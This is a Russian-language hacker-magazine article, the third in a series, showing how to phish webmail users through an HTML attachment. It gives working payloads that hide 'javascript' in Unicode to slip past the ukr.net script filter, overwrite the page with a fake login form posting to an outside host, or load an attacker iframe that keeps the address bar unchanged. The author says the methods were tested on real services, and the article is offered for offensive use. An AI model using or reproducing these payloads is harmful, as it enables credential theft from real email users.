Для тех кто в танке, это продолжение
статей на тему захвата ящика, смотри части первую
и вторую.
Что ж я наслышался многих упреков... Всем
что-то не нравится, но я повторяю: я показываю
рабочие примеры на реальных серваках. Использовать тот или иной
способ тебе никто не запрещает, я просто стараюсь расширить твое
мировоззрение. Знать, как использовать
какой-то баг это всегда хорошо.
На меня нагрузили мол все это не сработает на умном ламере 🙂 (даже
не звучит). Что мол все нормальные люди увидят разницу. Ну
во-первых, ты часто смотришь на адресную строку? Если да, то
все равно когда там написано чего-то похожее, ты
не заметишь разницы. Но и на самых глазастых найдется своя катаракта.
Итак цель: сохранить адресную строку неизменной.
Для начала скажу что все тестилось на www.ukr.net. Рассмотрим простой пример,
пользователю приходит письмо с вложением
main.html, которае изменяет 🙂 содержимое паги:
<IMG src="https://xakep.ru/wp-content/uploads/post/15702/JavaScript:
document.open();
document.clear();
document.write('<form action=http://main.host.com/cgi-bin/main.cgi>');
document.write('Login:<input type=text name=login><br>');
document.write('Passwd:<input type=password name=passwd><br>');
document.write('<input type=submit value=ok>');"
>
Теперь объясняю. На www.ukr.net как и на www.mail.ru аттач открывается сам, но
также и обрезаются все скрипты (точнее места где говорится о начале скрипта),
поэтому мы "javascript" пишем в юникоде. Очищаем окно браузера и выводим в него
простенькую форму регистрации.
Таким способом можно создать на лету нужную нам форму регистрации. Но пришлось
бы весь код патчить для того чтобы корректно
сработал ява скрипт. Мы можем это дело сделать по другому. Вставим в чистый документ фрейм, но не обычный, а
IFRAME так как браузер не позволяет яве генерить фреймы...
вроде 🙂 Значит наш аттач будет выглядеть гдето так:
<IMG src="https://xakep.ru/wp-content/uploads/post/15702/JavaScript:
document.open();
document.clear();
document.write('<iframe src=http://main.host.com/auth.html width=100%
height=100%</iframe>')"
>
В результате адресная строка не изменится, а в окне будет совсем другая пага,
хотя выглядеть они должны одинаково 😉
А теперь сдвинем фрейм в нулевую позицию для этого изменим 4-ую строку:
document.write('<body rightmargin=0 topmargin=0><iframe
src=http://main.host.com/auth.html width=100% height=100%</iframe>')"
Но палевный скроллбар у фрейма... Поставим фрейму height=1000 вместо
height=100%. Отлично!
Ну вот теперь качество нашей роботы
улучшилось 😉 Ждите добавки 🙂